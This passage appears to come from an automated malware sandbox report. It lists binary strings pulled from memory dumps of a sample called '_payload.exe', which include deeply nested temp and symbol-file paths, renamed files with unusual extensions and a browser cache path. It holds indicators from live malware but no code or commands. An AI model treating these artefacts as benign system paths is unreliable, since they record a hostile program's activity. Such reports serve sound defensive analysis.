              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\B/ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2252822948.000000000388C000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2241038155.000000000386A000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2250283430.000000000386A000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2251653609.0000000003889000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2241655390.0000000003891000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2254165587.000000000388F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\we\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2261869699.0000000003B53000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\!au source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2261307850.00000000037F3000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2285187218.00000000037FC000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2283628398.00000000037EA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2303570677.000000000394C000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2306593926.000000000393F000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2302847985.000000000394C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\3 source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2262926457.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2284252311.0000000003BC3000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2261615896.0000000003B92000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\icat{( source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2263808429.000000000394A000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2262263313.00000000038EA000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2261008047.00000000038EA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\pplic source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2313169253.0000000003979000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2309346506.0000000003969000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\Tk source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.1960744215.0000000003391000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ate\d source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2261225726.0000000003986000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2253471637.0000000003991000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2261008047.0000000003961000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2250908577.000000000398A000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2250283430.0000000003961000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\s source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2290160289.0000000003C22000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2285406721.0000000003C26000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\y source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219190417.00000000037BC000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219510848.00000000037F4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2290160289.0000000003C22000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\tCache\" source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2303833195.0000000003CFF000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\Application^ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2307032811.0000000003BF2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\4( source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2303833195.0000000003D57000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2299751780.0000000003D57000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\* source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2284103523.00000000037C0000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2290912491.00000000037CD000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2241580855.00000000037BC000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2220343349.00000000037CD000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2194113704.00000000037CF000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2291587000.00000000037D0000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2194076770.00000000037C7000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2261492169.00000000037C0000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193703978.00000000037BE000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2290747950.00000000037C8000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2313362539.00000000037CB000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2252360694.00000000037CF000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2254058984.00000000037D0000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2250768896.00000000037C0000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219190417.00000000037BC000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2243373293.00000000037CF000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2284743282.00000000037CD000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000002.23264611
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\20\\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2290160289.0000000003C22000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.errortorage\CacheStorage.edb.tgvve\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193490416.0000000003889000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193290817.0000000003868000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2299664958.0000000003C03000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2285406721.0000000003BDB000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2284252311.0000000003BC3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\e\#^m0 source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2241580855.00000000037BC000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2243108340.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219190417.00000000037BC000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2220175784.00000000037D5000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\p\D source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2218928019.0000000003924000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2241431328.000000000393D000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193290817.00000000038EE000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2220505539.000000000392F000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2218644067.00000000038EA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2218928019.0000000003924000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2241431328.000000000393D000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193290817.00000000038EE000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2220505539.000000000392F000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2218644067.00000000038EA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\\c source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2299293473.0000000003C9E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2290618686.000000000339D000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2284691080.000000000338E000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2285082947.0000000003395000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2283843769.0000000003366000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2291745039.00000000033A6000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\*a\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2284691080.000000000338E000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2285082947.0000000003395000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2283843769.0000000003366000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2286049396.00000000033AE000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2286088788.00000000033B2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\l source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2303570677.000000000394C000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2306593926.000000000393F000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2302847985.000000000394C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\e\\bi source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2250283430.000000000386A000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2252822948.0000000003874000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\e\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2289759297.00000000037FF000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2290952465.0000000003817000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\3 source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219190417.00000000037BC000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219510848.00000000037F4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\Ap source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2242070892.000000000339F000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2241962914.0000000003368000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\\w source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2289759297.00000000037FF000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2290952465.0000000003817000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\h source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2303833195.0000000003CFF000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb.tgvva source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193290817.0000000003868000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ewy\\n D source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2313169253.0000000003979000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2309346506.0000000003969000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\fnU source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2241580855.00000000037BC000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193886000.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193703978.00000000037BE000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2242013730.00000000037F4000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219190417.00000000037BC000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219510848.00000000037F4000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2242573181.00000000037F8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb.tgvv source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193290817.00000000038EE000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2242821627.0000000003B3B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\ros source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193832137.000000000339F000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193661261.000000000338E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\* source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219190417.00000000037BC000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219510848.00000000037F4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\GPUCache\.pdb\a\Adobe source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2313304101.0000000003C23000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2309605483.0000000003C03000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\b source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2261225726.0000000003986000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2261008047.0000000003961000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2283443210.0000000003913000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2283524784.0000000003986000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb\TempState\h source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193490416.0000000003889000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193290817.0000000003868000.00000004.00000020.00020000.00000000.sdmp
